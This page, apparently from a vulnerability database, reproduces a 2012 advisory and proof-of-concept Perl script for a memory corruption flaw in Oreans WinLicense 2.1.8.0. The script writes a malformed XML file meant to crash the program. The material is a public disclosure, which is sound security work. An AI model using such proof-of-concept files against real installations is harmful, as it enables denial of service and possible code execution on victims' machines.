Lucene search

K

Oreans WinLicense v2.1.8.0 XML File Handling Unspecified Memory Corruption

🗓️ 20 Mar 2012 00:00:00Reported by Gjoko KrsticType 
zeroscience
 zeroscience
🔗 zeroscience.mk👁 21 Views

Oreans WinLicense v2.1.8.0 XML File Handling Unspecified Memory Corruption. Allows arbitrary code execution and DoS

Show more
Code
<html><body><p>#!/usr/bin/perl
#
#
# Oreans WinLicense v2.1.8.0 XML File Handling Unspecified Memory Corruption
#
#
# Vendor: Oreans Technologies
# Product web page: http://www.oreans.com
# Affected version: 2.1.8.0 (32/64bit)
#
# Summary: WinLicense combines the same protection-level as Themida with the
# power of advanced license control, offering the most powerful and flexible
# technology that allows developers to securely distribute trial and registered
# versions of their applications.
#
# Desc: WinLicense is prone to an unspecified memory corruption vulnerability.
# An attacker can exploit this issue by tricking a victim into opening a malicious
# XML file to execute arbitrary code and to cause denial-of-service conditions.
#
# Tested on: Microsoft Windows XP Professional SP3 (EN) (32bit)
#            Microsoft Windows 7 Ultimate SP1 (EN) (64bit)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2012-5080
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5080.php
#
#
# 20.03.2012
#
#

use strict;

my $file = "zsl.xml";
my $hit = "Joxy-\\x\\-Poxy";
print "\n\n[*] Creating $file file...\n";
open ZSL, "&gt;./$file" || die "\nCan't open $file: $!";
print ZSL $hit;
print "\n[.] File successfully mounted!\n\n";
close ZSL;
</p></body></html>

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
20 Mar 2012 00:00Current
8.2High risk
Vulners AI Score8.2
21
.json
Report